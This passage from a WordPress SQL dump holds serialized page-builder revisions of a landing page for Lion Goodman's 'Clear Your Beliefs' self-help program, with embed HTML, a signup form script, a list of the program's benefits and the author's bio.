Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1081, 1573, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:532:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1082, 1574, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 255px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1083, 1575, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 255px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 